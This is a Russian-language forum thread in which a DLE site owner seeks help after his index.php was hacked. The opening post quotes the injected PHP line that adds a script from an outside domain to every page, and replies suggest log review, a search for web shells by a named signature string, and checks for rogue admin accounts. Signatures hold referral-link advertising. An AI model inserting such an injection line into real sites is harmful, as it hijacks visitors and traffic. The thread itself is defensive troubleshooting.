Взлом DLE

12
Anarchist
На сайте с 23.07.2008
Offline
185
2584

Наверное, у многих, кто держит DLE появилась проблема со взломом сайта на автомате.

В index.php добавляется

echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<script src=http://promediagroup.ru/d.js></script>', $tpl->result['main']); 

Никак не могу нагуглить, что это за дырочка такая, и как с ней бороться. Надоело уже сливать трафик с ПС непонятно куда.

Знает кто-нибудь полезную инфу по этому вопросу?

KU
На сайте с 17.07.2008
Offline
251
#1

Смотрите access лог за время изменения файла.

POST запросы не увидите, но все-таки...

Хостинг ( https://good-host.net ) / Linux VPS ( https://good-host.net/vps ) / Windows VPS ( https://good-host.net/windows-vps ) / Выделенные серверы ( https://good-host.net/dedicated ) 14 лет онлайн!
Хортица
На сайте с 22.12.2006
Offline
289
#2
Anarchist:
Знает кто-нибудь полезную инфу по этому вопросу?

Безусловно.

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
Anarchist
На сайте с 23.07.2008
Offline
185
#3

Описанные прививки уже давным давно сделаны. Спасибо всё же.

Хочу сам разобраться в вопросе :)

Хортица
На сайте с 22.12.2006
Offline
289
#4

Anarchist, модуль переходов (он же referer) установлен ?

Соседние сайты на ДЛЕ есть ? Наличие на хостинге/сервере шелов проверяли ? Наличие админов незнакомых смотрели ?

[Удален]
#5

ХортицаА мудуль переходов обьязательно надо убрать с сайта?закрыл все диры,скрипт не исполняется,но самы запросы появляются в блоге...

Хортица
На сайте с 22.12.2006
Offline
289
#6

A.H., в каком нафиг блоГе ? Как и зачем вы закрывали дИры ? Извините, но я не понимаю Ваших слов.

Anarchist
На сайте с 23.07.2008
Offline
185
#7
Хортица:
Anarchist, модуль переходов (он же referer) установлен ?

Нет

Хортица:
Соседние сайты на ДЛЕ есть ?

Виртуальный хостинг. На моем аккаунте нет, но вообще вполне могут быть на сервере. Но не думаю, что прав хватит.

Хортица:
Наличие на хостинге/сервере шелов проверяли ?

Да, отсутствуют.

Хортица:
Наличие админов незнакомых смотрели ?

Он один - это я :)

PS: поставил на файл index.php запрет на запись. Не помогло - опять выставлены 666 =\

Хортица
На сайте с 22.12.2006
Offline
289
#8
Anarchist:
PS: поставил на файл index.php запрет на запись. Не помогло - опять выставлены 666 =\

100% есть шел. То что Вы думаете что прав не хватит - это оочень большое заблуждение!

Вариантов куда воткнуть часть шела для запуска - множество. Я на своем опыте встречал и в файле сапы, и в engine.php и в init.php, некоторые даже инклюдили из dbconfig.php шел.

Просите суппорт чтобы искал файлы содержащие часть из фразы "WEB shell by ORB" это самый распространенный вариант использования. Или же как я Вам и писал в первом же своем сообщении всегда есть Вариант №2 ;)

Anarchist
На сайте с 23.07.2008
Offline
185
#9

Сначала я расшибусь в лепёшку, решая этот вопрос, а потом, если не получится всё равно ничего, то придётся прибегнуть к вашей помощи. Но у меня уже спортивный азарт открылся :)

Хортица
На сайте с 22.12.2006
Offline
289
#10

Anarchist, ну тогда успехов. Мне пришлось 2ое суток напролет перерывать логи, прежде чем узнал как и откуда ломали сайты.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий